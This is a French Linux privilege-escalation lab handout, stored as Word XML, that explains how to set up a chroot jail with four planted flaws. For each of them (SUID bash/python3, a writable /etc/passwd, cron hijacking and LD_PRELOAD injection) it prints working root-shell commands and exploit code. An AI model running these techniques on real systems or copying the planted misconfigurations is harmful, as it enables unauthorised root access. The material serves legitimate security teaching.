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jail-lab---travaux-pratiques"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JAIL LAB - Travaux Pratiques</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="X7189b1818742c642b3c27275a0892b72d39ea2a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Laboratoire de Privilege Escalation Linux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able-des-matières"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1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Prérequis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installation de l’environnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Architecture du chroot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnérabilités disponibles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 SUID Bit Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Writable /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Cron Job Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 LD_PRELOAD Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation pas à pas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nettoyage de l’environnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/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Ce laboratoire permet de pratiquer les techniques d’élévation de privilèges (privilege escalation) sous Linux dans un environnement isolé et sécurisé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objectifs pédagogiques :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comprendre le fonctionnement d’un environnement chroot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identifier les mauvaises configurations de sécurité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploiter différentes vulnérabilités pour obtenir un accès root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apprendre les bonnes pratiques de sécurisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Niveau :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Intermédiaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Durée estimée :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2-3 heures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="26" w:name="prérequis"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Prérequis</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="matériel-nécessaire"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Matériel nécessaire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 ou 12 (installation minimale)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attaquante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 Linux (ou toute distribution avec outils pentest)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deux machines doivent pouvoir communiquer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="compétences-requises"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compétences requises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connaissances de base en administration Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilisation du terminal et des commandes shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Notions de base en sécurité informatique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stallation-de-lenvironnement"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Installation de l’environnement</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="27" w:name="sur-la-machine-debian-cible"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Sur la machine Debian (cible)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connectez-vous en root et exécutez les commandes suivantes :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Passer en root</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">su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Mise à jour du système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Installation des dépendances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git dos2unix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Clonage du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https://github.com/Slurptheworld/Jail.git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Jail</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Conversion des fins de ligne</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dos2unix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Attribution des droits d'exécution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Lancement de l'installation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">./setup_jail.sh</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="vérification-de-linstallation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Vérification de l’installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Après l’installation, vérifiez que l’environnement est fonctionnel :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vérifier que l'utilisateur existe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jailed</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vérifier la configuration SSH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 User jailed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/ssh/sshd_config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architecture-du-chroot"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Architecture du chroot</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="30" w:name="schéma-de-lenvironnement"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Schéma de l’environnement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DEBIAN SERVER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 │            CHROOT JAIL (/home/jailed)               │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │                                                     │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   /bin/       → Binaires (bash, ls, cat, etc.)     │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   /lib/       → Librairies système                 │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   /lib64/     → Librairies 64 bits                 │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   /etc/       → Fichiers de configuration          │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   /tmp/       → Fichiers temporaires               │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   /dev/       → Devices (null, tty, urandom)       │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │                                                     │ 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0"/>
    <w:bookmarkStart w:id="31" w:name="identifiants-de-connexion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Identifiants de connexion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d’accès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vers chroot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="connexion-au-lab"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Connexion au lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Depuis la machine attaquante (Kali) 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jailed@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IP_DEBIAN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vulnérabilités-disponibles"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Vulnérabilités disponibles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chaque vulnérabilité est activée par un script dédié.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exécutez ces scripts en root sur le serveur Debian.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Vulnérabilité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vuln_suid.sh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SUID sur bash/python3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vuln_passwd.sh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/etc/passwd modifiable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vuln_cron.sh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job hijacking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vuln_ldpreload.sh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LD_PRELOAD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Difficile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8" w:name="suid-bit-exploitation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 SUID Bit Exploitation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="34" w:name="concept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 bit SUID (Set User ID) permet à un exécutable de s’exécuter avec les privilèges de son propriétaire plutôt que ceux de l’utilisateur qui le lance.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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">possède le bit SUID et appartient à root, n’importe quel utilisateur peut obtenir un shell root.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="activation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./vuln_suid.sh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/home/jailed/bin/bash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/home/jailed/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="exploitation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jailed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Méthode 1 : bash avec -p (preserve privileges)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Méthode 2 : python3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/python3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os; os.setuid(0); os.system("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37" w:name="vérification"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vérification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Résultat attendu : root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writable-etcpasswd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Writable /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="39" w:name="concept-1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 fichier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contient les informations des utilisateurs du système. Si ce fichier est modifiable par un utilisateur non privilégié, il peut créer un compte avec UID 0 (root).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="activation-1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./vuln_passwd.sh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/home/jailed/etc/passwd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666 /home/jailed/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="exploitation-1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jailed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Ajouter un utilisateur root sans mot de passe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'hacker::0:0:hacker:/root:/bin/bash'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/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Se connecter avec ce nouvel utilisateur</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacker</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="format-de-la-ligne-etcpasswd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Format de la ligne /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username:password:UID:GID:comment:home:shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hacker  :        :0  :0  :hacker :/root:/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">         └─ vide = pas de mot de passe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ron-job-hijacking"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Cron Job Hijacking</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="44" w:name="concept-2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Les tâches cron sont des scripts exécutés automatiquement à intervalles réguliers. Si un utilisateur peut modifier un script exécuté par root via cron, il peut injecter des commandes malveillantes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="activation-2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./vuln_cron.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce script crée une tâche cron vulnérable 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/home/jailed/etc/cron.d/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 * * * * root /home/jailed/tmp/malicious.sh"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/home/jailed/etc/cron.d/vuln_cron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777 /home/jailed/etc/cron.d/vuln_cron</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="exploitation-2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jailed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Étape 1 :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Créer le script malveillant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/tmp/malicious.sh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cp /bin/bash /tmp/rootbash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 4755 /tmp/rootbash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/tmp/malicious.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Étape 2 :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attendre 1 minute (exécution du cron)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Étape 3 :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exécuter le shell SUID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/rootbash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ld_preload-injection"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 LD_PRELOAD Injection</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="48" w:name="concept-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/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est une variable d’environnement qui permet de charger une bibliothèque partagée avant toutes les autres. Si un binaire SUID permet le chargement de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 on peut injecter du code arbitraire avec les privilèges root.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="activation-3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./vuln_ldpreload.sh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/usr/bin/env /home/jailed/bin/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/home/jailed/bin/env</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="exploitation-3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jailed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Étape 1 :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Créer la bibliothèque malveillante</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Fichier : /tmp/exploit.c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setgid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setuid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"/bin/bash"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Étape 2 :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Compiler la bibliothèque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/tmp/exploit.so /tmp/exploit.c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-nostartfiles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Étape 3 :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exécuter avec LD_PRELOAD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LD_PRELOAD=/tmp/exploit.so /bin/ls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exploitation-pas-à-pas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Exploitation pas à pas</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="53" w:name="checklist-de-test"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Checklist de test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilisez cette checklist pour vérifier chaque vulnérabilité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SUID bash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/bin/bash -p &amp;&amp; whoami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/etc/passwd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/etc/passwd \| grep hacker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Ligne hacker présente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 -la /tmp/rootbash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avec SUID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Compilation +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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="54" w:name="commandes-utiles"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Commandes utiles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Rechercher les binaires SUID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-4000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Vérifier les permissions de /etc/passwd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/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Lister les tâches cron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/etc/cron.d/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vérifier les variables d'environnement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LD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nettoyage-de-lenvironnement"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Nettoyage de l’environnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour remettre la Debian à zéro après le TP :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./cleanup_jail.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce script supprime :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’utilisateur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jailed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les règles sudo vulnérables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le répertoire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
